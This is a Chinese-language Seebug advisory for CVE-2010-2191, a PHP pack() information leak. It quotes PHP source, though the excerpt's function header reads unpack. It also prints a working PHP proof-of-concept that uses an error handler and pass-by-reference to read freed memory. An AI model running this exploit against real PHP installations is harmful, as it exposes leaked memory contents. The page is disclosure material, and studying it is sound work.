Lucene search
RootSSV:19878HistoryJun 28, 2010 - 12:00 a.m.
PHP pack()函数中断处理信息泄露漏洞
2010-06-2800:00:00
Root
www.seebug.org
20
0.006 Low
EPSS
Percentile
75.2%
CVE ID: CVE-2010-2191
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的pack()函数中存在信息泄露漏洞:
PHP_FUNCTION(unpack)
{
char *format, *input, *formatarg, *inputarg;
int formatlen, formatarg_len, inputarg_len;
int inputpos, inputlen, i;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &formatarg, &formatarg_len,
&inputarg, &inputarg_len) == FAILURE) {
return;
}
format = formatarg;
formatlen = formatarg_len;
input = inputarg;
函数开始时读取了用户所提供的参数并在解析前确保格式串为确实的字符串。由于call time pass by reference功能,函数中间的中断可能允许更改当前所工作的参数,其中一种可能的攻击为H格式串标识符:
case ‘h’:
case ‘H’: {
int nibbleshift = (code == ‘h’) ? 0 : 4;
int first = 1;
char *v;
val = argv[currentarg++];
convert_to_string_ex(val);
v = Z_STRVAL_PP(val);
outputpos--;
if(arg > Z_STRLEN_PP(val)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Type %c: not enough characters in string", code);
arg = Z_STRLEN_PP(val);
}
这里将字符串指针拷贝到了v变量然后验证字符串的长度。之后错误处理器可以向字符串变量中添加更多的字符以导致重新分配字符串缓冲区。由于使用了之前所储存的v,会泄露已释放的内存。
PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
厂商补丁:
PHP
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<?php
$first = true;
function my_error($a,$x)
{
global $first;
if ($first) {
var_dump($x);
$GLOBALS['var'].=str_repeat("A",2000);
}
$first = false;
return 1;
}
/* Detect 32 vs 64 bit */
$i = 0x7fffffff;
$i++;
if (is_float($i)) {
$l = 39;
} else {
$l = 67;
}
$GLOBALS['var'] = base64_decode(str_repeat("-", 1000).base64_encode("AAAAAAAAAAAAAAAA"));
/* Trigger the Code */
set_error_handler("my_error");
$x = pack("h20", &$GLOBALS['var']);
restore_error_handler();
hexdump($x);
/* Helper function */
function hexdump($x)
{
$l = strlen($x);
$p = 0;
echo "Hexdump\n";
echo "-------\n";
while ($l > 16) {
echo sprintf("%08x: ",$p);
for ($i=0; $i<16; $i++) {
echo sprintf("%02X ", ord($x[$p+$i]));
}
echo " ";
for ($i=0; $i<16; $i++) {
$c = ord($x[$p+$i]);
echo ($c < 32 || $c > 127) ? '.' : chr($c);
}
$l-=16;
$p+=16;
echo "\n";
}
if ($l > 0)
echo sprintf("%08x: ",$p);
for ($i=0; $i<$l; $i++) {
echo sprintf("%02X ", ord($x[$p+$i]));
}
for ($i=0; $i<16-$l; $i++) { echo "-- "; }
echo " ";
for ($i=0; $i<$l; $i++) {
$c = ord($x[$p+$i]);
echo ($c < 32 || $c > 127) ? '.' : chr($c);
}
echo "\n";
}
?>
Related
prion
prion
Memory corruption
2010-06-08 00:30:00
seebug
seebug
PHP unpack()函数中断处理信息泄露漏洞
2010-06-28 00:00:00
ubuntucve
ubuntucve
CVE-2010-2191
2010-06-08 00:00:00
cve
cve
CVE-2010-2191
2010-06-08 00:30:00
openvas
openvas
PHP Multiple Information Disclosure Vulnerabilities
2010-06-15 00:00:00
PHP < 5.2.14 Multiple Vulnerabilities
2012-06-21 00:00:00
PHP < 5.2.14 Multiple Vulnerabilities
2020-08-17 00:00:00
nessus
nessus
PHP 5.2 < 5.2.14 Multiple Vulnerabilities
2010-08-04 00:00:00
PHP 5.3 < 5.3.3 Multiple Vulnerabilities
2010-08-04 00:00:00
SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110)
2010-10-11 00:00:00
securityvulns
securityvulns
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00